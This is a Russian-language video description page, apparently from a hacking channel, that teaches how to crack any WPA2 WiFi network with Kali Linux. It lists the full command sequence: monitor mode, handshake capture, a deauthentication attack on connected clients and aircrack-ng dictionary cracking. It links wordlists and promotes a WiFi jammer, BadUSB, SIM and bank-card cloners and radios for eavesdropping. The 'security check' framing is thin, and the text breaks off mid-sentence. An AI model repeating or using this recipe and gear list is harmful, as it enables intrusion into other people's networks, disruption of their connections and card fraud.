{100%} Как взломать любой WiFi? | WPA2 | Kali Linux | UnderMind

26.02.2018
● В этом ролике я покажу, что ни одну WiFi сеть нельзя считать защищенной. Так как проверка моей сети показала то, что доступ к сети может получить кто угодно. В этом ролике я покажу, как я это сделал. ● Снял продолжение: брутфорс со скоростью до 500 000 тыс паролей в секунду используя видеокарту: https://goo.gl/HbDh8i ● Ништяки для хакинга и не только: - https://goo.gl/i7VHWP - WiFi Jammer (Глушилка WIFI сигнала) - https://goo.gl/wfTvK4 - Ruby Duck (BadUSB). Незаменимое устройство для получения любых данных и информации - https://goo.gl/snvemZ - Дубликатор RFID ключей и карт - https://goo.gl/we9brk - Считыватель и дубликатор телефонных SIM карт - https://goo.gl/sKamy7 - Считыватель и дубликатор пластиковых карт - https://goo.gl/dKibg5 - Недорогие, но очень мощные рации (можно прослушивать сами знаете кого) - https://goo.gl/bJcbsd - Микро камера - https://goo.gl/c5eWga - Недорогой, но мощный адаптер для взлома WiFi - https://goo.gl/Bv19xK - Ультрафиолетовый Фонарик для просмотра отпечатков пальцев - https://goo.gl/aTttMU - USB Tester для измерения ёмкости батареи телефона и PowerBank ● Подписывайтесь на канал! ● Ссылка на донат: http://www.donationalerts.ru/r/ozzyone ● Я ВКонтакте: https://vk.com/TheUnderMind ● Порядок команд: - ifconfig - airmon-ng check kill - airmon-ng start wlan0 - airodump-ng wlan0mon - airodump-ng --bssid [MAC адрес точки доступа – без скобок!] --channel 1 -w wifi wlan0mon - aireplay-ng --deauth 20 -a [MAC точки доступа] -c [MAC подключенного клиента] wlan0mon - wpaclean ИмяНовогоФайла ИмяСтарогоФайла - aircrack-ng -w [ПутьКСловарю] -b [MAC точки доступа] [ЧистыйХэндшейк .cap] ● Набор словарей: - https://goo.gl/z7mnhf - Даты, использовать первым - https://goo.gl/4BBPQy - Номера Телефонов RUS, использовать вторым - https://goo.gl/bVsfo2 - Элитный словарь от InsidePRO - https://goo.gl/Ab2fTE - Дополнительный словарь на 9 млн. слов ● В ролике "Проверка WiFi на Безопасность | WPA2 | UnderMind" - я рассказываю об информационной безопасности. Существует множество способов получения доступа к сети WiFi, в том числе социальная инженерия или уязвимости в WPS, но об этом как-нибудь в другой раз. И сейчас поговорим о самом надежном (на мой взгляд) методе, который сработает со 100% вероятностью. ● Сама проверка у нас подразделяется на 2 части. Первая: это захват хендшейка или рукопожатия. В понятии WiFi сетей это что-то вроде «Привет, чувак. Подключи меня», «Привет. Какой пароль?», «Пароль: Блаблабла». Мы прослушиваем эти данные, но поскольку пароль передается в зашифрованном виде, мы переходим ко второму этапу. А именно: к расшифровке хендшейка. Всё делать мы будем на Kali Linux. Первой командой смотрим интерфейс нашего WiFi адаптера ifconfig Выбираем тот, который отвечает за WiFi, это как правило самый последний. Теперь переводим наш WiFi адаптер в режим монитора. В этом режиме он будет ловить все пакеты WiFi, даже предназначенные другим устройствам. Делаем это командой: airmon-ng check kill airmon-ng start wlan0 Теперь раб

Похожие видео

Показать еще